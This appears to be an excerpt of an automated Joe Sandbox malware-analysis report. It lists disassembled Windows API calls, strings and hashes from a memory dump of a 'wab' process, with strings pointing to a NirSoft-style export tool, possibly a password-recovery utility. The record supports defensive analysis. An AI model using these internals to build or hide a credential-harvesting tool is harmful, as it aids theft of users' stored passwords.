                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                      • GetSysColor.USER32(0000000F), ref: 00410999
                      • DeleteObject.GDI32(?), ref: 004109D0
                      • DeleteObject.GDI32(?), ref: 004109D6
                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                      • String ID:
                      • API String ID: 1010922700-0
                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                      APIs
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                      • malloc.MSVCRT ref: 004186B7
                      • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                      • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                      • malloc.MSVCRT ref: 004186FE
                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$FullNamePath$malloc$Version
                      • String ID: |A
                      • API String ID: 4233704886-1717621600
                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                      • API String ID: 2081463915-1959339147
                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                      • API String ID: 2012295524-70141382
                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                      APIs
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                      • API String ID: 667068680-3953557276
                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                      APIs
                      • GetDC.USER32(00000000), ref: 004121FF
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                      • SelectObject.GDI32(?,?), ref: 00412251
                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                      • SetCursor.USER32(00000000), ref: 004122BC
                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                      • memcpy.MSVCRT ref: 0041234D
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                      • String ID:
                      • API String ID: 1700100422-0
                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004111E0
                      • GetWindowRect.USER32(?,?), ref: 004111F6
                      • GetWindowRect.USER32(?,?), ref: 0041120C
                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                      • GetWindowRect.USER32(00000000), ref: 0041124D
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                      • String ID:
                      • API String ID: 552707033-0
                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                        • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                      • memcpy.MSVCRT ref: 0040C11B
                      • strchr.MSVCRT ref: 0040C140
                      • strchr.MSVCRT ref: 0040C151
                      • _strlwr.MSVCRT ref: 0040C15F
                      • memset.MSVCRT ref: 0040C17A
                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                      • String ID: 4$h
                      • API String ID: 4066021378-1856150674
                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_snwprintf
                      • String ID: %%0.%df
                      • API String ID: 3473751417-763548558
                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                      APIs
                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                      • KillTimer.USER32(?,00000041), ref: 004060D7
                      • KillTimer.USER32(?,00000041), ref: 004060E8
                      • GetTickCount.KERNEL32 ref: 0040610B
                      • GetParent.USER32(?), ref: 00406136
                      • SendMessageW.USER32(00000000), ref: 0040613D
                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                      • String ID: A
                      • API String ID: 2892645895-3554254475
                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                      APIs
                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                      • GetDesktopWindow.USER32 ref: 0040D9FD
                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                      • memset.MSVCRT ref: 0040DA23
                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                      • String ID: caption
                      • API String ID: 973020956-4135340389
                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                      APIs
                      Strings
                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_snwprintf$wcscpy
                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                      • API String ID: 1283228442-2366825230
                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                      APIs
                      • wcschr.MSVCRT ref: 00413972
                      • wcscpy.MSVCRT ref: 00413982
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                      • wcscpy.MSVCRT ref: 004139D1
                      • wcscat.MSVCRT ref: 004139DC
                      • memset.MSVCRT ref: 004139B8
                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                      • memset.MSVCRT ref: 00413A00
                      • memcpy.MSVCRT ref: 00413A1B
                      • wcscat.MSVCRT ref: 00413A27
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                      • String ID: \systemroot
                      • API String ID: 4173585201-1821301763
                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscpy
                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                      • API String ID: 1284135714-318151290
                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                      • String ID: 0$6
                      • API String ID: 4066108131-3849865405
                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                      APIs
                      • memset.MSVCRT ref: 004082EF
                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                      • memset.MSVCRT ref: 00408362
                      • memset.MSVCRT ref: 00408377
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ByteCharMultiWide
                      • String ID:
                      • API String ID: 290601579-0
                      • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                      • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memchrmemset
                      • String ID: PD$PD
                      • API String ID: 1581201632-2312785699
                      • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                      • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                      APIs
                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                      • GetDC.USER32(00000000), ref: 00409F6E
                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                      • GetParent.USER32(?), ref: 00409FA5
                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                      • String ID:
                      • API String ID: 2163313125-0
                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$wcslen
                      • String ID:
                      • API String ID: 239872665-3916222277
                      • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                      • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpywcslen$_snwprintfmemset
                      • String ID: %s (%s)$YV@
                      • API String ID: 3979103747-598926743
                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                      APIs
                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                      • wcslen.MSVCRT ref: 0040A6B1
                      • wcscpy.MSVCRT ref: 0040A6C1
                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                      • wcscpy.MSVCRT ref: 0040A6DB
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                      • String ID: Unknown Error$netmsg.dll
                      • API String ID: 2767993716-572158859
                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                      APIs
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • wcscpy.MSVCRT ref: 0040DAFB
                      • wcscpy.MSVCRT ref: 0040DB0B
                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
